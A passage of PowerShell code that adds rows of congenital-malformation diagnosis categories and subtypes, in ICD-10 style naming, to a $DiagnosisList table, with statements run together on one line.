$DiagnosisList.Rows.Add("Congenital diverticulum of bladder","Congenital diverticulum of bladder") + $null = $DiagnosisList.Rows.Add("Other and unspecified congenital malformations of bladder and urethra","Unspecified congenital malformation of bladder and urethra") + $null = $DiagnosisList.Rows.Add("Other and unspecified congenital malformations of bladder and urethra","Congenital prolapse of urethra") + $null = $DiagnosisList.Rows.Add("Other and unspecified congenital malformations of bladder and urethra","Congenital prolapse of urinary meatus") + $null = $DiagnosisList.Rows.Add("Other and unspecified congenital malformations of bladder and urethra","Congenital urethrorectal fistula") + $null = $DiagnosisList.Rows.Add("Other and unspecified congenital malformations of bladder and urethra","Double urethra") + $null = $DiagnosisList.Rows.Add("Other and unspecified congenital malformations of bladder and urethra","Double urinary meatus") + $null = $DiagnosisList.Rows.Add("Other and unspecified congenital malformations of bladder and urethra","Other congenital malformations of bladder and urethra") + $null = $DiagnosisList.Rows.Add("Other specified congenital malformations of urinary system","Other specified congenital malformations of urinary system") + $null = $DiagnosisList.Rows.Add("Congenital malformation of urinary system, unspecified","Congenital malformation of urinary system, unspecified") + $null = $DiagnosisList.Rows.Add("Congenital dislocation of hip, unilateral","Congenital dislocation of unspecified hip, unilateral") + $null = $DiagnosisList.Rows.Add("Congenital dislocation of hip, unilateral","Congenital dislocation of right hip, unilateral") + $null = $DiagnosisList.Rows.Add("Congenital dislocation of hip, unilateral","Congenital dislocation of left hip, unilateral") + $null = $DiagnosisList.Rows.Add("Congenital dislocation of hip, bilateral","Congenital dislocation of hip, bilateral") + $null = $DiagnosisList.Rows.Add("Congenital dislocation of hip, unspecified","Congenital dislocation of hip, unspecified") + $null = $DiagnosisList.Rows.Add("Congenital partial dislocation of hip, unilateral","Congenital partial dislocation of unspecified hip, unilateral") + $null = $DiagnosisList.Rows.Add("Congenital partial dislocation of hip, unilateral","Congenital partial dislocation of right hip, unilateral") + $null = $DiagnosisList.Rows.Add("Congenital partial dislocation of hip, unilateral","Congenital partial dislocation of left hip, unilateral") + $null = $DiagnosisList.Rows.Add("Congenital partial dislocation of hip, bilateral","Congenital partial dislocation of hip, bilateral") + $null = $DiagnosisList.Rows.Add("Congenital partial dislocation of hip, unspecified","Congenital partial dislocation of hip, unspecified") + $null = $DiagnosisList.Rows.Add("Congenital unstable hip","Congenital unstable hip") + $null = $DiagnosisList.Rows.Add("Other congenital deformities of hip","Congenital coxa valga") + $null = $DiagnosisList.Rows.Add("Other congenital deformities of hip","Congenital coxa vara") + $null = $DiagnosisList.Rows.Add("Other congenital deformities of hip","Other specified congenital deformities of hip") + $null = $DiagnosisList.Rows.Add("Congenital deformity of hip, unspecified","Congenital deformity of hip, unspecified") + $null = $DiagnosisList.Rows.Add("Congenital deformities of feet","Congenital talipes equinovarus") + $null = $DiagnosisList.Rows.Add("Congenital deformities of feet","Congenital talipes calcaneovarus") + $null = $DiagnosisList.Rows.Add("Congenital metatarsus (primus) varus","Congenital metatarsus primus varus") + $null = $DiagnosisList.Rows.Add("Congenital metatarsus (primus) varus","Congenital metatarsus adductus") + $null = $DiagnosisList.Rows.Add("Other congenital varus deformities of feet","Other congenital varus deformities of feet") + $null = $DiagnosisList.Rows.Add("Congenital talipes calcaneovalgus","Congenital talipes calcaneovalgus") + $null = $DiagnosisList.Rows.Add("Congenital pes planus","Congenital pes planus, unspecified foot") + $null = $DiagnosisList.Rows.Add("Congenital pes planus","Congenital pes planus, right foot") + $null = $DiagnosisList.Rows.Add("Congenital pes planus","Congenital pes planus, left foot") + $null = $DiagnosisList.Rows.Add("Other congenital valgus deformities of feet","Other congenital valgus deformities of feet") + $null = $DiagnosisList.Rows.Add("Congenital pes cavus","Congenital pes cavus") + $null = $DiagnosisList.Rows.Add("Other congenital deformities of feet","Congenital vertical talus deformity, unspecified foot") + $null = $DiagnosisList.Rows.Add("Other congenital deformities of feet","Congenital vertical talus deformity, right foot") + $null = $DiagnosisList.Rows.Add("Other congenital deformities of feet","Congenital vertical talus deformity, left foot") + $null = $DiagnosisList.Rows.Add("Other congenital deformities of feet","Other specified congenital deformities of feet") + $null = $DiagnosisList.Rows.Add("Congenital deformity of feet, unspecified","Congenital deformity of feet, unspecified") + $null = $DiagnosisList.Rows.Add("Congenital musculoskeletal deformities of head, face, spine and chest","Congenital facial asymmetry") + $null = $DiagnosisList.Rows.Add("Congenital musculoskeletal deformities of head, face, spine and chest","Congenital compression facies") + $null = $DiagnosisList.Rows.Add("Congenital musculoskeletal deformities of head, face, spine and chest","Dolichocephaly") + $null = $DiagnosisList.Rows.Add("Congenital musculoskeletal deformities of head, face, spine and chest","Plagiocephaly") + $null = $DiagnosisList.Rows.Add("Congenital musculoskeletal deformities of head, face, spine and chest","Other congenital deformities of skull, face and jaw") + $null = $DiagnosisList.Rows.Add("Congenital musculoskeletal deformities of head, face, spine and chest","Congenital deformity of spine") + $null = $DiagnosisList.Rows.Add("Congenital musculoskeletal deformities of head, face, spine and chest","Pectus excavatum") + $null = $DiagnosisList.Rows.Add("Congenital musculoskeletal deformities of head, face, spine and chest","Pectus carinatum") + $null = $DiagnosisList.Rows.Add("Congenital musculoskeletal deformities of head, face, spine and chest","Other congenital deformities of chest") + $null = $DiagnosisList.Rows.Add("Other congenital musculoskeletal deformities","Congenital deformity of sternocleidomastoid muscle") + $null = $DiagnosisList.Rows.Add("Other congenital musculoskeletal deformities","Congenital deformity of finger(s) and hand") + $null = $DiagnosisList.Rows.Add("Other congenital musculoskeletal deformities","Congenital deformity of knee") + $null = $DiagnosisList.Rows.Add("Other congenital musculoskeletal deformities","Congenital bowing of femur") + $null = $DiagnosisList.Rows.Add("Other congenital musculoskeletal deformities","Congenital bowing of tibia and fibula") + $null = $DiagnosisList.Rows.Add("Other congenital musculoskeletal deformities","Congenital bowing of long bones of leg, unspecified") + $null = $DiagnosisList.Rows.Add("Other congenital musculoskeletal deformities","Discoid meniscus") + $null = $DiagnosisList.Rows.Add("Other congenital musculoskeletal deformities","Other specified congenital musculoskeletal deformities") + $null = $DiagnosisList.Rows.Add("Polydactyly","Accessory finger(s)") + $null = $DiagnosisList.Rows.Add("Polydactyly","Accessory thumb(s)") + $null = $DiagnosisList.Rows.Add("Polydactyly","Accessory toe(s)") + $null = $DiagnosisList.Rows.Add("Polydactyly","Polydactyly, unspecified") + $null = $DiagnosisList.Rows.Add("Fused fingers","Fused fingers, unspecified hand") + $null = $DiagnosisList.Rows.Add("Fused fingers","Fused fingers, right hand") + $null = $DiagnosisList.Rows.Add("Fused fingers","Fused fingers, left hand") + $null = $DiagnosisList.Rows.Add("Fused fingers","Fused fingers, bilateral") + $null = $DiagnosisList.Rows.Add("Webbed fingers","Webbed fingers, unspecified hand") + $null = $DiagnosisList.Rows.Add("Webbed fingers","Webbed fingers, right hand") + $null = $DiagnosisList.Rows.Add("Webbed fingers","Webbed fingers, left hand") + $null = $DiagnosisList.Rows.Add("Webbed fingers","Webbed fingers, bilateral") + $null = $DiagnosisList.Rows.Add("Fused toes","Fused toes, unspecified foot") + $null = $DiagnosisList.Rows.Add("Fused toes","Fused toes, right foot") + $null = $DiagnosisList.Rows.Add("Fused toes","Fused toes, left foot") + $null = $DiagnosisList.Rows.Add("Fused toes","Fused toes, bilateral") + $null = $DiagnosisList.Rows.Add("Webbed toes","Webbed toes, unspecified foot") + $null = $DiagnosisList.Rows.Add("Webbed toes","Webbed toes, right foot") + $null = $DiagnosisList.Rows.Add("Webbed toes","Webbed toes, left foot") + $null = $DiagnosisList.Rows.Add("Webbed toes","Webbed toes, bilateral") + $null = $DiagnosisList.Rows.Add("Polysyndactyly, unspecified","Polysyndactyly, unspecified") + $null = $DiagnosisList.Rows.Add("Syndactyly, unspecified","Syndactyly, unspecified") + $null = $DiagnosisList.Rows.Add("Congenital complete absence of upper limb","Congenital complete absence of unspecified upper limb") + $null = $DiagnosisList.Rows.Add("Congenital complete absence of upper limb","Congenital complete absence of right upper limb") + $null = $DiagnosisList.Rows.Add("Congenital complete absence of upper limb","Congenital complete absence of left upper limb") + $null = $DiagnosisList.Rows.Add("Congenital complete absence of upper limb","Congenital complete absence of upper limb, bilateral") + $null = $DiagnosisList.Rows.Add("Congenital absence of upper arm and forearm with hand present","Congenital absence of unspecified upper arm and forearm with hand present") + $null = $DiagnosisList.Rows.Add("Congenital absence of upper arm and forearm with hand present","Congenital absence of right upper arm and forearm with hand present") + $null = $DiagnosisList.Rows.Add("Congenital absence of upper arm and forearm with hand present","Congenital absence of left upper arm and forearm with hand present") + $null = $DiagnosisList.Rows.Add("Congenital absence of upper arm and forearm with hand present","Congenital absence of upper arm and forearm with hand present, bilateral") + $null = $DiagnosisList.Rows.Add("Congenital absence of both forearm and hand","Congenital absence of both forearm and hand, unspecified upper limb") + $null = $DiagnosisList.Rows.Add("Congenital absence of both forearm and hand","Congenital absence of both forearm and hand, right upper limb") + $null = $DiagnosisList.Rows.Add("Congenital absence of both forearm and hand","Congenital absence of both forearm and hand, left upper limb") + $null = $DiagnosisList.Rows.Add("Congenital absence of both forearm and hand","Congenital absence of both forearm and hand, bilateral") + $null = $DiagnosisList.Rows.Add("Congenital absence of hand and finger","Congenital absence of unspecified hand and finger") + $null = $DiagnosisList.Rows.Add("Congenital absence of hand and finger","Congenital absence of right hand and finger") + $null = $DiagnosisList.Rows.Add("Congenital absence of hand and finger","Congenital absence of left hand and finger") + $null = $DiagnosisList.Rows.Add("Congenital absence of hand and finger","Congenital absence of hand and finger, bilateral") + $null = $DiagnosisList.Rows.Add("Longitudinal reduction defect of radius","Longitudinal reduction defect of unspecified radius") + $null = $DiagnosisList.Rows.Add("Longitudinal reduction defect of radius","Longitudinal reduction defect of right radius") + $null = $DiagnosisList.Rows.Add("Longitudinal reduction defect of radius","Longitudinal reduction defect of left radius") + $null = $DiagnosisList.Rows.Add("Longitudinal reduction defect of radius","Longitudinal reduction defect of radius, bilateral") + $null = $DiagnosisList.Rows.Add("Longitudinal reduction defect of ulna","Longitudinal reduction defect of unspecified ulna") + $null = $DiagnosisList.Rows.Add("Longitudinal reduction defect of ulna","Longitudinal reduction defect of right ulna") + $null = $DiagnosisList.Rows.Add("Longitudinal reduction defect of ulna","Longitudinal reduction defect of left ulna") + $null = $DiagnosisList.Rows.Add("Longitudinal reduction defect of ulna","Longitudinal reduction defect of ulna, bilateral") + $null = $DiagnosisList.Rows.Add("Lobster-claw hand","Lobster-claw hand, unspecified hand") + $null = $DiagnosisList.Rows.Add("Lobster-claw hand","Lobster-claw right hand") + $null = $DiagnosisList.Rows.Add("Lobster-claw hand","Lobster-claw left hand") + $null = $DiagnosisList.Rows.Add("Lobster-claw hand","Lobster-claw hand, bilateral") + $null = $DiagnosisList.Rows.Add("Congenital shortening of upper limb","Congenital shortening of right upper limb") + $null = $DiagnosisList.Rows.Add("Congenital shortening of upper limb","Congenital shortening of left upper limb") + $null = $DiagnosisList.Rows.Add("Congenital shortening of upper limb","Congenital shortening of upper limb, bilateral") + $null = $DiagnosisList.Rows.Add("Congenital shortening of upper limb","Congenital shortening of unspecified upper limb") + $null = $DiagnosisList.Rows.Add("Other reduction defects of upper limb","Other reduction defects of right upper limb") + $null = $DiagnosisList.Rows.Add("Other reduction defects of upper limb","Other reduction defects of left upper limb") + $null = $DiagnosisList.Rows.Add("Other reduction defects of upper limb","Other reduction defects of upper limb, bilateral") + $null = $DiagnosisList.Rows.Add("Other reduction defects of upper limb","Other reduction defects of unspecified upper limb") + $null = $DiagnosisList.Rows.Add("Unspecified reduction defect of upper limb","Unspecified reduction defect of unspecified upper limb") + $null = $DiagnosisList.Rows.Add("Unspecified reduction defect of upper limb","Unspecified reduction defect of right upper limb") + $null = $DiagnosisList.Rows.Add("Unspecified reduction defect of upper limb","Unspecified reduction defect of left upper limb") + $null = $DiagnosisList.Rows.Add("Unspecified reduction defect of upper limb","Unspecified reduction defect of upper limb, bilateral") + $null = $DiagnosisList.Rows.Add("Congenital complete absence of lower limb","Congenital complete absence of unspecified lower limb") + $null = $DiagnosisList.Rows.Add("Congenital complete absence of lower limb","Congenital complete absence of right lower limb") + $null = $DiagnosisList.Rows.Add("Congenital complete absence of lower limb","Congenital complete absence of left lower limb") + $null = $DiagnosisList.Rows.Add("Congenital complete absence of lower limb","Congenital complete absence of lower limb, bilateral") + $null = $DiagnosisList.Rows.Add("Congenital absence of thigh and lower leg with foot present","Congenital absence of unspecified thigh and lower leg with foot present") + $null = $DiagnosisList.Rows.Add("Congenital absence of thigh and lower leg with foot present","Congenital absence of right thigh and lower leg with foot present") + $null = $DiagnosisList.Rows.Add("Congenital absence of thigh and lower leg with foot present","Congenital absence of left thigh and lower leg with foot present") + $null = $DiagnosisList.Rows.Add("Congenital absence of thigh and lower leg with foot present","Congenital absence of thigh and lower leg with foot present, bilateral") + $null = $DiagnosisList.Rows.Add("Congenital absence of both lower leg and foot","Congenital absence of both lower leg and foot, unspecified lower limb") + $null = $DiagnosisList.Rows.Add("Congenital absence of both lower leg and foot","Congenital absence of both lower leg and foot, right lower limb") + $null = $DiagnosisList.Rows.Add("Congenital absence of both lower leg and foot","Congenital absence of both lower leg and foot, left lower limb") + $null = $DiagnosisList.Rows.Add("Congenital absence of both lower leg and foot","Congenital absence of both lower leg and foot, bilateral") + $null = $DiagnosisList.Rows.Add("Congenital absence of foot and toe(s)","Congenital absence of unspecified foot and toe(s)") + $null = $DiagnosisList.Rows.Add("Congenital absence of foot and toe(s)","Congenital absence of right foot and toe(s)") + $null = $DiagnosisList.Rows.Add("Congenital absence of foot and toe(s)","Congenital absence of left foot and toe(s)") + $null = $DiagnosisList.Rows.Add("Congenital absence of foot and toe(s)","Congenital absence of foot and toe(s), bilateral") + $null = $DiagnosisList.Rows.Add("Longitudinal reduction defect of femur","Longitudinal reduction defect of unspecified femur") + $null = $DiagnosisList.Rows.Add("Longitudinal reduction defect of femur","Longitudinal reduction defect of right femur") + $null = $DiagnosisList.Rows.Add("Longitudinal reduction defect of femur","Longitudinal reduction defect of left femur") + $null = $DiagnosisList.Rows.Add("Longitudinal reduction defect of femur","Longitudinal reduction defect of femur, bilateral") + $null = $DiagnosisList.Rows.Add("Longitudinal reduction defect of tibia","Longitudinal reduction defect of unspecified tibia") + $null = $DiagnosisList.Rows.Add("Longitudinal reduction defect of tibia","Longitudinal reduction defect of right tibia") + $null = $DiagnosisList.Rows.Add("Longitudinal reduction defect of tibia","Longitudinal reduction defect of left tibia") + $null = $DiagnosisList.Rows.Add("Longitudinal reduction defect of tibia","Longitudinal reduction defect of tibia, bilateral") + $null = $DiagnosisList.Rows.Add("Longitudinal reduction defect of fibula","Longitudinal reduction defect of unspecified fibula") + $null = $DiagnosisList.Rows.Add("Longitudinal reduction defect of fibula","Longitudinal reduction defect of right fibula") + $null = $DiagnosisList.Rows.Add("Longitudinal reduction defect of fibula","Longitudinal reduction defect of left fibula") + $null = $DiagnosisList.Rows.Add("Longitudinal reduction defect of fibula","Longitudinal reduction defect of fibula, bilateral") + $null = $DiagnosisList.Rows.Add("Split foot","Split foot, unspecified lower limb") + $null = $DiagnosisList.Rows.Add("Split foot","Split foot, right lower limb") + $null = $DiagnosisList.Rows.Add("Split foot","Split foot, left lower limb") + $null = $DiagnosisList.Rows.Add("Split foot","Split foot, bilateral") + $null = $DiagnosisList.Rows.Add("Congenital shortening of lower limb","Congenital shortening of right lower limb") + $null = $DiagnosisList.Rows.Add("Congenital shortening of lower limb","Congenital shortening of left lower limb") + $null = $DiagnosisList.Rows.Add("Congenital shortening of lower limb","Congenital shortening of lower limb, bilateral") + $null = $DiagnosisList.Rows.Add("Congenital shortening of lower limb","Congenital shortening of unspecified lower limb") + $null = $DiagnosisList.Rows.Add("Other reduction defects of lower limb","Other reduction defects of right lower limb") + $null = $DiagnosisList.Rows.Add("Other reduction defects of lower limb","Other reduction defects of left lower limb") + $null = $DiagnosisList.Rows.Add("Other reduction defects of lower limb","Other reduction defects of lower limb, bilateral") + $null = $DiagnosisList.Rows.Add("Other reduction defects of lower limb","Other reduction defects of unspecified lower limb") + $null = $DiagnosisList.Rows.Add("Unspecified reduction defect of lower limb","Unspecified reduction defect of unspecified lower limb") + $null = $DiagnosisList.Rows.Add("Unspecified reduction defect of lower limb","Unspecified reduction defect of right lower limb") + $null = $DiagnosisList.Rows.Add("Unspecified reduction defect of lower limb","Unspecified reduction defect of left lower limb") + $null = $DiagnosisList.Rows.Add("Unspecified reduction defect of lower limb","Unspecified reduction defect of lower limb, bilateral") + $null = $DiagnosisList.Rows.Add("Reduction defects of unspecified limb","Congenital absence of unspecified limb(s)") + $null = $DiagnosisList.Rows.Add("Reduction defects of unspecified limb","Phocomelia, unspecified limb(s)") + $null = $DiagnosisList.Rows.Add("Reduction defects of unspecified limb","Other reduction defects of unspecified limb(s)") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of limb(s)","Other congenital malformations of upper limb(s), including shoulder girdle") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of limb(s)","Congenital malformation of knee") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of limb(s)","Other congenital malformations of lower limb(s), including pelvic girdle") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of limb(s)","Arthrogryposis multiplex congenita") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of limb(s)","Other specified congenital malformations of limb(s)") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of limb(s)","Unspecified congenital malformation of limb(s)") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of skull and face bones","Craniosynostosis") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of skull and face bones","Craniofacial dysostosis") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of skull and face bones","Hypertelorism") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of skull and face bones","Macrocephaly") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of skull and face bones","Mandibulofacial dysostosis") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of skull and face bones","Oculomandibular dysostosis") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of skull and face bones","Other specified congenital malformations of skull and face bones") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of skull and face bones","Congenital malformation of skull and face bones, unspecified") + $null = $DiagnosisList.Rows.Add("Congenital malformations of spine and bony thorax","Spina bifida occulta") + $null = $DiagnosisList.Rows.Add("Congenital malformations of spine and bony thorax","Klippel-Feil syndrome") + $null = $DiagnosisList.Rows.Add("Congenital malformations of spine and bony thorax","Congenital spondylolisthesis") + $null = $DiagnosisList.Rows.Add("Congenital malformations of spine and bony thorax","Congenital scoliosis due to congenital bony malformation") + $null = $DiagnosisList.Rows.Add("Congenital kyphosis","Congenital kyphosis, occipito-atlanto-axial region") + $null = $DiagnosisList.Rows.Add("Congenital kyphosis","Congenital kyphosis, cervical region") + $null = $DiagnosisList.Rows.Add("Congenital kyphosis","Congenital kyphosis, cervicothoracic region") + $null = $DiagnosisList.Rows.Add("Congenital kyphosis","Congenital kyphosis, thoracic region") + $null = $DiagnosisList.Rows.Add("Congenital kyphosis","Congenital kyphosis, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Congenital kyphosis","Congenital kyphosis, unspecified region") + $null = $DiagnosisList.Rows.Add("Congenital lordosis","Congenital lordosis, thoracolumbar region") + $null = $DiagnosisList.Rows.Add("Congenital lordosis","Congenital lordosis, lumbar region") + $null = $DiagnosisList.Rows.Add("Congenital lordosis","Congenital lordosis, lumbosacral region") + $null = $DiagnosisList.Rows.Add("Congenital lordosis","Congenital lordosis, sacral and sacrococcygeal region") + $null = $DiagnosisList.Rows.Add("Congenital lordosis","Congenital lordosis, unspecified region") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of spine, not associated with scoliosis","Other congenital malformations of spine, not associated with scoliosis") + $null = $DiagnosisList.Rows.Add("Cervical rib","Cervical rib") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of ribs","Other congenital malformations of ribs") + $null = $DiagnosisList.Rows.Add("Congenital malformation of sternum","Congenital malformation of sternum") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of bony thorax","Other congenital malformations of bony thorax") + $null = $DiagnosisList.Rows.Add("Congenital malformation of bony thorax, unspecified","Congenital malformation of bony thorax, unspecified") + $null = $DiagnosisList.Rows.Add("Osteochondrodysplasia with defects of growth of tubular bones and spine","Achondrogenesis") + $null = $DiagnosisList.Rows.Add("Osteochondrodysplasia with defects of growth of tubular bones and spine","Thanatophoric short stature") + $null = $DiagnosisList.Rows.Add("Osteochondrodysplasia with defects of growth of tubular bones and spine","Short rib syndrome") + $null = $DiagnosisList.Rows.Add("Osteochondrodysplasia with defects of growth of tubular bones and spine","Chondrodysplasia punctata") + $null = $DiagnosisList.Rows.Add("Osteochondrodysplasia with defects of growth of tubular bones and spine","Achondroplasia") + $null = $DiagnosisList.Rows.Add("Osteochondrodysplasia with defects of growth of tubular bones and spine","Diastrophic dysplasia") + $null = $DiagnosisList.Rows.Add("Osteochondrodysplasia with defects of growth of tubular bones and spine","Chondroectodermal dysplasia") + $null = $DiagnosisList.Rows.Add("Osteochondrodysplasia with defects of growth of tubular bones and spine","Spondyloepiphyseal dysplasia") + $null = $DiagnosisList.Rows.Add("Osteochondrodysplasia with defects of growth of tubular bones and spine","Other osteochondrodysplasia with defects of growth of tubular bones and spine") + $null = $DiagnosisList.Rows.Add("Osteochondrodysplasia with defects of growth of tubular bones and spine","Osteochondrodysplasia with defects of growth of tubular bones and spine, unspecified") + $null = $DiagnosisList.Rows.Add("Other osteochondrodysplasias","Osteogenesis imperfecta") + $null = $DiagnosisList.Rows.Add("Other osteochondrodysplasias","Polyostotic fibrous dysplasia") + $null = $DiagnosisList.Rows.Add("Other osteochondrodysplasias","Osteopetrosis") + $null = $DiagnosisList.Rows.Add("Other osteochondrodysplasias","Progressive diaphyseal dysplasia") + $null = $DiagnosisList.Rows.Add("Other osteochondrodysplasias","Enchondromatosis") + $null = $DiagnosisList.Rows.Add("Other osteochondrodysplasias","Metaphyseal dysplasia") + $null = $DiagnosisList.Rows.Add("Other osteochondrodysplasias","Multiple congenital exostoses") + $null = $DiagnosisList.Rows.Add("Other osteochondrodysplasias","Other specified osteochondrodysplasias") + $null = $DiagnosisList.Rows.Add("Other osteochondrodysplasias","Osteochondrodysplasia, unspecified") + $null = $DiagnosisList.Rows.Add("Congenital malformations of musculoskeletal system, not elsewhere classified","Congenital diaphragmatic hernia") + $null = $DiagnosisList.Rows.Add("Congenital malformations of musculoskeletal system, not elsewhere classified","Other congenital malformations of diaphragm") + $null = $DiagnosisList.Rows.Add("Congenital malformations of musculoskeletal system, not elsewhere classified","Exomphalos") + $null = $DiagnosisList.Rows.Add("Congenital malformations of musculoskeletal system, not elsewhere classified","Gastroschisis") + $null = $DiagnosisList.Rows.Add("Congenital malformations of musculoskeletal system, not elsewhere classified","Prune belly syndrome") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of abdominal wall","Congenital hernia of bladder") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of abdominal wall","Other congenital malformations of abdominal wall") + $null = $DiagnosisList.Rows.Add("Ehlers-Danlos syndrome","Ehlers-Danlos syndrome") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of musculoskeletal system","Other congenital malformations of musculoskeletal system") + $null = $DiagnosisList.Rows.Add("Congenital malformation of musculoskeletal system, unspecified","Congenital malformation of musculoskeletal system, unspecified") + $null = $DiagnosisList.Rows.Add("Congenital ichthyosis","Ichthyosis vulgaris") + $null = $DiagnosisList.Rows.Add("Congenital ichthyosis","X-linked ichthyosis") + $null = $DiagnosisList.Rows.Add("Congenital ichthyosis","Lamellar ichthyosis") + $null = $DiagnosisList.Rows.Add("Congenital ichthyosis","Congenital bullous ichthyosiform erythroderma") + $null = $DiagnosisList.Rows.Add("Congenital ichthyosis","Harlequin fetus") + $null = $DiagnosisList.Rows.Add("Congenital ichthyosis","Other congenital ichthyosis") + $null = $DiagnosisList.Rows.Add("Congenital ichthyosis","Congenital ichthyosis, unspecified") + $null = $DiagnosisList.Rows.Add("Epidermolysis bullosa","Epidermolysis bullosa simplex") + $null = $DiagnosisList.Rows.Add("Epidermolysis bullosa","Epidermolysis bullosa letalis") + $null = $DiagnosisList.Rows.Add("Epidermolysis bullosa","Epidermolysis bullosa dystrophica") + $null = $DiagnosisList.Rows.Add("Epidermolysis bullosa","Other epidermolysis bullosa") + $null = $DiagnosisList.Rows.Add("Epidermolysis bullosa","Epidermolysis bullosa, unspecified") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of skin","Hereditary lymphedema") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of skin","Xeroderma pigmentosum") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of skin","Congenital cutaneous mastocytosis") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of skin","Incontinentia pigmenti") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of skin","Ectodermal dysplasia (anhidrotic)") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of skin","Congenital non-neoplastic nevus") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of skin","Congenital sacral dimple") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of skin","Other specified congenital malformations of skin") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of skin","Congenital malformation of skin, unspecified") + $null = $DiagnosisList.Rows.Add("Congenital malformations of breast","Congenital absence of breast with absent nipple") + $null = $DiagnosisList.Rows.Add("Congenital malformations of breast","Accessory breast") + $null = $DiagnosisList.Rows.Add("Congenital malformations of breast","Absent nipple") + $null = $DiagnosisList.Rows.Add("Congenital malformations of breast","Accessory nipple") + $null = $DiagnosisList.Rows.Add("Congenital malformations of breast","Other congenital malformations of breast") + $null = $DiagnosisList.Rows.Add("Congenital malformations of breast","Congenital malformation of breast, unspecified") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of integument","Congenital alopecia") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of integument","Congenital morphological disturbances of hair, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of integument","Other congenital malformations of hair") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of integument","Anonychia") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of integument","Congenital leukonychia") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of integument","Enlarged and hypertrophic nails") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of integument","Other congenital malformations of nails") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of integument","Other specified congenital malformations of integument") + $null = $DiagnosisList.Rows.Add("Other congenital malformations of integument","Congenital malformation of integument, unspecified") + $null = $DiagnosisList.Rows.Add("Neurofibromatosis (nonmalignant)","Neurofibromatosis, unspecified") + $null = $DiagnosisList.Rows.Add("Neurofibromatosis (nonmalignant)","Neurofibromatosis, type 1") + $null = $DiagnosisList.Rows.Add("Neurofibromatosis (nonmalignant)","Neurofibromatosis, type 2") + $null = $DiagnosisList.Rows.Add("Neurofibromatosis (nonmalignant)","Schwannomatosis") + $null = $DiagnosisList.Rows.Add("Neurofibromatosis (nonmalignant)","Other neurofibromatosis") + $null = $DiagnosisList.Rows.Add("Tuberous sclerosis","Tuberous sclerosis") + $null = $DiagnosisList.Rows.Add("Other phakomatoses, not elsewhere classified","Other phakomatoses, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Phakomatosis, unspecified","Phakomatosis, unspecified") + $null = $DiagnosisList.Rows.Add("Congenital malformation syndromes due to known exogenous causes, not elsewhere classified","Fetal alcohol syndrome (dysmorphic)") + $null = $DiagnosisList.Rows.Add("Congenital malformation syndromes due to known exogenous causes, not elsewhere classified","Fetal hydantoin syndrome") + $null = $DiagnosisList.Rows.Add("Congenital malformation syndromes due to known exogenous causes, not elsewhere classified","Dysmorphism due to warfarin") + $null = $DiagnosisList.Rows.Add("Congenital malformation syndromes due to known exogenous causes, not elsewhere classified","Other congenital malformation syndromes due to known exogenous causes") + $null = $DiagnosisList.Rows.Add("Other specified congenital malformation syndromes affecting multiple systems","Congenital malformation syndromes predominantly affecting facial appearance") + $null = $DiagnosisList.Rows.Add("Other specified congenital malformation syndromes affecting multiple systems","Congenital malformation syndromes predominantly associated with short stature") + $null = $DiagnosisList.Rows.Add("Other specified congenital malformation syndromes affecting multiple systems","Congenital malformation syndromes predominantly involving limbs") + $null = $DiagnosisList.Rows.Add("Other specified congenital malformation syndromes affecting multiple systems","Congenital malformation syndromes involving early overgrowth") + $null = $DiagnosisList.Rows.Add("Marfan's syndrome","Marfan's syndrome, unspecified") + $null = $DiagnosisList.Rows.Add("Marfan's syndrome with cardiovascular manifestations","Marfan's syndrome with aortic dilation") + $null = $DiagnosisList.Rows.Add("Marfan's syndrome with cardiovascular manifestations","Marfan's syndrome with other cardiovascular manifestations") + $null = $DiagnosisList.Rows.Add("Marfan's syndrome with ocular manifestations","Marfan's syndrome with ocular manifestations") + $null = $DiagnosisList.Rows.Add("Marfan's syndrome with skeletal manifestation","Marfan's syndrome with skeletal manifestation") + $null = $DiagnosisList.Rows.Add("Other congenital malformation syndromes with other skeletal changes","Other congenital malformation syndromes with other skeletal changes") + $null = $DiagnosisList.Rows.Add("Other specified congenital malformation syndromes, not elsewhere classified","Alport syndrome") + $null = $DiagnosisList.Rows.Add("Other specified congenital malformation syndromes, not elsewhere classified","Arterial tortuosity syndrome") + $null = $DiagnosisList.Rows.Add("Other specified congenital malformation syndromes, not elsewhere classified","Other specified congenital malformation syndromes, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Congenital absence and malformations of spleen","Asplenia (congenital)") + $null = $DiagnosisList.Rows.Add("Congenital absence and malformations of spleen","Congenital malformations of spleen") + $null = $DiagnosisList.Rows.Add("Congenital malformations of adrenal gland","Congenital malformations of adrenal gland") + $null = $DiagnosisList.Rows.Add("Congenital malformations of other endocrine 